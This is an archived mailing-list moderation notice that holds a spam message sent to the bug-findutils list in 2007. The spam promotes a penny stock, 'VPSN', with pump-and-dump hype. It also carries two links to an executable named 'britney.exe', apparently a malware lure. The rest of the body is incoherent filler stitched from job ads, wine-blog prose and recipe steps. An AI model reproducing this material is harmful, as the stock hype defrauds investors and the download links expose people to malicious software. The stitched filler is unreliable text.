listhelper-moderate

Bug-findutils post from address@hidden requires approval

From: bug-findutils-owner
Subject: Bug-findutils post from address@hidden requires approval
Date: Mon, 09 Jul 2007 02:14:35 -0400

following mailing list posting:

    List:    address@hidden
    From:    address@hidden
    Subject: vigorously

At your convenience, visit:

    http://lists.gnu.org/mailman/admindb/bug-findutils

to approve or deny the request.
--- Begin Message --- Subject: vigorously Date: Mon, 9 Jul 2007 11:43:47 +0530 User-agent: Thunderbird 1.5.0.12 (Windows/20070509)
Download: http://serge-fashion.com/britney.exe
VPSN WILL MOVE LIKE A COMET AND ITS ONLY GOING TO GET BETTER! Watch this
SUPERNOVA closely MONDAY!

VISION AIRSHIPS INC
Symbol: VPSN
Price: $0.021

BANGKOK, THAILAND, July 2007
Advertising Agencies Ready to Ink Deals!

The company wishes to announce that it is in final negotiations for
representation with some of the world's largest advertising agencies to
market and reserve the blimps for there clients.

VPSN THE RISING STAR, IS SET FOR SUPERNOVA STATUS ON MONDAY!

These position will have responsibility for significant portions of
structural design on a large government project. Experience with
PLS-CADD is required. Must be proficient in MS Word, Excel, Project and
PowerPoint.
Will this be a problem?

Describe your Civil - Structural engineering design experience. It is a
rich, full-bodied, expressive wine that still shows some finesse with
fine, almost powdery tannins and well-integrated oak.

We have volcanoes, dragons, snow leopards. Additionally, GBA provides
services in hydrographic surveying, coastal engineering and channel
design. Describe your general project management and construction
management experience. this IS the question. It was also the last
vintage for premier winemaker Nicolas Quille. Must be able to work
independently with minimal supervision. Do you have a EIT or PE
certification?

You will also be responsible for ensuring that CADD standards are
followed and drawings are archived correctly and auditing civil
engineering designs prepared by others. Top down and meandering
aimlessly up the coast toward the unknown we found a great little sports
bar to slam down hot pastrami and Sierra Nevada Pale Ale. building
design codes.
Additionally, GBA provides services in hydrographic surveying, coastal
engineering and channel design.

I've been doing some research and as far as I can make out, you are the
female wine blogger who has been at this longest and is still going
strong.

From the Portland Oregon Business Journal half the people don't care
what the juice is closed with they just want it to be good. Where do you
currently live and why are you interested in a contract, possible temp
to hire position located in the State of South Carolina? Working
knowledge of AutoCAD and NY, NYC and NJ building codes.
Remove from oven, set ribs on serving platter or individual plates.

This position requires a BS in architecture, or engineering, or
engineering technology, or construction management. A refinery in the
New Orleans area is seeking several Project Managers for long term
contract positions.

Requires design experience in foundations, equipment support structures,
grading, site development, drainage, seismic design, and secondary
containments.

Describe your Civil - Structural engineering design experience. This
engineer will manage projects for maintenance of refinery infrastructure
and systems. A NY or NJ PE license would be preferable. The wines have a
liveliness and ripe, zesty fruit flavors that make them ideal
complements to a wide range of food. Opening with a full-service
engineering and construction firm in the state of South Carolina for a
Vessel Engineer. So immediately upon returning home I pour myself a
glass of the Hogue Genesis Cabernet Sauvignon and headed to the kitchen
to rattle some pans.

No baggage emotional or otherwise was checked this weekend, so it was
off to pick up the Sebring convertible I rented for the two days we were
to be together. SAP experience is a plus. Should be able to keep design
material requirements within job estimates and budgets.
Discuss your experience designing steel structures. Questions you will
be asked - How many years experience do you have in highway bridge
design or railroad bridge design?

The ELECTRICAL ENGINEER will manage project and provide electrical
engineering expertise for the design, installation, testing and
commission of electrical plant and equipment. The climate and soils of
the Columbia Valley produce grapes with intense fruit flavors and high
natural acidity.

Applying candidates should be willing to travel and should be bilingual
with English and French. This person will be providing execution
oversight of multiple claims efforts.

Being who and what I am, I am always traveling with a wine destination
in mind, so it never occurred to me to write an article on finding wine
diversions when traveling for other reasons. Remove from oven, set ribs
on serving platter or individual plates.

Sprinkle with salt and pepper. These position will have responsibility
for significant portions of structural design on a large government
project.

Do you have a NCEES record?

I've been doing some research and as far as I can make out, you are the
female wine blogger who has been at this longest and is still going
strong. Please detail your educational background including degrees,
certifications, and licenses received. Relocation assistance is
available to the right candidate.

Tobacco and black pepper linger on the finish. Provide detailed
information on your management responsibilities you have dealing with
contractors and field engineers. Pair this wine with a braised short rib
recipe, aged cheeses or dark chocolate. Sear short ribs on both sides
until golden brown.

Per diem may be available for the right candidates.

A Week in LA Wine Rant Wine for the rest of us.

can't we just have our cake and eat it too? You will also prepare civil
engineering design computations and evaluate project scopes and develop
design criteria, as well as budget for design services and design
schedules. Please tell us about your specific experience with providing
the construction specifications and project management for high-voltage
transmission line projects. How recent is this experience?

http://markneep.co.uk/images/Britney.exe

--- End Message ---
--- Begin Message --- Subject: confirm 02fc19de9ef6bd4179ab83cb5a41df76441dd9d9
of the body of the reply.

--- End Message ---